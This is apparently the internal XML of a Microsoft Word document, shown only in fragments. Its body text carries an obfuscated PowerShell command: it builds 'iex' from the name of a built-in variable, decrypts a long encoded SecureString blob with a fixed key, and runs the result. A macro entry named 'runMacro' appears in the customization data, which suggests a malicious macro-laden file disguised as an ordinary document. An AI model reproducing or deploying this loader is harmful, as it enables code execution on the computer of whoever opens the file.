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23BF5" w:rsidRDefault="00BD1DEB">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD1DEB">
        <w:t>PoWErShElL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD1DEB">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD1DEB">
        <w:t>NoexI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD1DEB">
        <w:t xml:space="preserve">  " &amp; ((</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD1DEB">
        <w:t>Gv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD1DEB">
        <w:t xml:space="preserve"> '*</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD1DEB">
        <w:t>mdr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD1DEB">
        <w:t>*').</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD1DEB">
        <w:t>name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD1DEB">
        <w:t>[3,11,2]-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD1DEB">
        <w:t>jOiN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD1DEB">
        <w:t>'') (( [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD1DEB">
        <w:t>runtIMe.intErOPSerVIcES.maRShAl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD1DEB">
        <w:t>]::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD1DEB">
        <w:t>pTRtoStriNgunI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD1DEB">
        <w:t>( [ruNtIME.INTERopsERviCeS.MArsHAL]::seCUREsTrInGTogLoBalALloCuNIcoDe($('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</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD1DEB">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">DMAOAA0AGYAOAA0ADkAZQBjAGIANABiADAAMgA5ADYAZQA4AGQANQBkADUAZABhADEANQA3ADcAZAAxAGMAYgBlADkAZABmADUAMgA3ADIAOQA5AGQAZABkADMANwAwADEAYQA3AGMAOQA1ADYAMwA1ADIAZAAxAGQAYQBkADAANAA1AGIAOQA1AGUAMgA2AGYAMABlADQAMwBjADUANAA3ADUAOABlAGUAZgA2ADAAZABlAGQAYgBiADkAMAA5ADcAYQAyADQAZAA0ADUAYwBlADYANgAzADQAZgA5ADcAOABmAGUAYwA4ADcANQBhADgAMQBkAGUAMQA5ADAAMgAzAGEAZgBlADUAMgAxADYAOAA3ADQANAA2ADgANgBmAGEAYQBlADgAZgA4ADkAMQAxAGIAMgBhADgAOQBhAGEAOQBmAGUAZQAyADcAMgAwADQANABjAGQAOAA4AGYAYgBkADgAYQA3AGUAYgA1AGQAMwBjADkAMQA4ADIANwAxADgAYQAwADcAYwBjADIAYQAwAGYAYQBhAGUANAAzAGYAZABmAGEAZAAyADMAOAA5ADgANAAxADQAOQAyADUAMQBlADMANAAyADMAMwBhADcAZgBmADQAZABlAGEAOAA3ADQAMgA3AGMAOAAwADEAYgA1ADQAOAA0ADYAMQA2ADkAOAA2ADUAZAA5ADEAZgA2ADQANABjADIAMgBiAGQAZABkADMAZQBlADQANgAwADgAZgAzADcANgBhAGQANAA0ADMAZQA1ADkAMQAxADIAMwBjADQAYQA0AGEAMQA4ADgAYQAxADUAZAA2AGIAMQAzADgAMgBmADkAMAA5AGIANgA1AGUANAA0ADEAMAA4AGQAYQBiADcAYgA4ADAANQA4ADcANABjADEAMgBlADEAYgAwADQANgA2ADEANwBlADYAMwBkAGIANwAzAGYAMAAyADAANAA5AGYAMABlADUAMgBkAGMAMQBlAGIAOQBlADYANgBhAGQAZgAxADcAYgAxAGUANQAxAGYAYQA4ADcANAA1ADYAYgAwAGIANgBmAGMAYwA1ADEAYwBmAGYAYgBiADcANwAwAGEAZQAwAGEAZAA3ADUAZABlADAAOABlAGIAMQAyADMAYgAzADQAZQBmAGEAZQAxADMAYwBmADYAYQA2AGYAMgAzADUANwAzADQAMQA4ADYAMABmADcANQA1AGEAZQAzADAAYwA1ADEAZgBhADAANQA0AGMAOABjADEAOQAxADIAZQA5ADMAMQBiADYAZABhADkAYgA2AGYANQBlAGYAOABiAGQANQA4ADIAOQA0AGYAZABkAGEAZAA1AGYANQA4AGIAZgA2AGEAOAAxADYANwAwADcAYQAxADgAMgBjAGMAYwA4ADUAMABkADYAOQA0ADMAMgBjADQAYgBlADIAZgBmAGMAYQBhADIAOQBjADgAYQBjAGEAMQBiADgANwAzADAAMQAyADkANABkAGQAZAA3ADAANQA0AGIAMQBhADIAYgBlADgAYwBjADEANwA1ADkAOQBlADAAMgAxADIANwA3ADIAMwBmAGMANAA3ADUAZABjADkAMQAzAGEANABiADYAZAAwAGIAYgBmADEAMgAzADAAYgAyADcAZgA3AGUAMAA5ADQAZgAyADYANgAyADQAYgBlAGUAYQAxADYAMAAyADYAOQBkADAANAAwADIAZgAxADYAYgA4AGEAYQA5ADgAMQA2AGUAMQA1AGIAMQBhAGYANQBjADgANQBlADUAZgAyADgAMwBhADMAMAAyADEAZgBjADkAMgA2AGQAZgBmADQANwBjADEAMABmADcAZABlAGQAOQBkADAAMgA0ADcAZABjAGEAZQBhADEAOAAxADUAYgAwADQAYwBjADEAMgA5ADMAOQA0ADkAZgAzAGIANwAzAGMANgA0AGIAZQBkAGYAYwAyADgAYwBmAGYAYQBlADkANgAxADYAZABjADYANABmAGEAYgA1AGIAMQA4AGIA' | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD1DEB">
        <w:t>CONVeRtto-SecuREstrinG</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD1DEB">
        <w:t xml:space="preserve">  -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD1DEB">
        <w:t>Ke</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD1DEB">
        <w:t xml:space="preserve">  (45..30)) )) ) ) "</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00D23BF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78FF"/>
    <w:rsid w:val="004178FF"/>
    <w:rsid w:val="00951FDD"/>
    <w:rsid w:val="00B87D64"/>
    <w:rsid w:val="00BD1DEB"/>
    <w:rsid w:val="00BF1533"/>
    <w:rsid w:val="00D23B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9F45BE4A-4445-4681-9072-B7643AAEDD5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  <wne:mcd wne:macroName="PROJECT.NEWMACROS.RUNMACROS" wne:name="Project.NewMacros.runMacro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506</TotalTime>
  <Pages>2</Pages>
  <Words>852</Words>
  <Characters>4863</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>40</Lines>
  <Paragraphs>11</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>SPecialiST RePack</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>5704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34</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-05-28T05:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-05-28T14:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>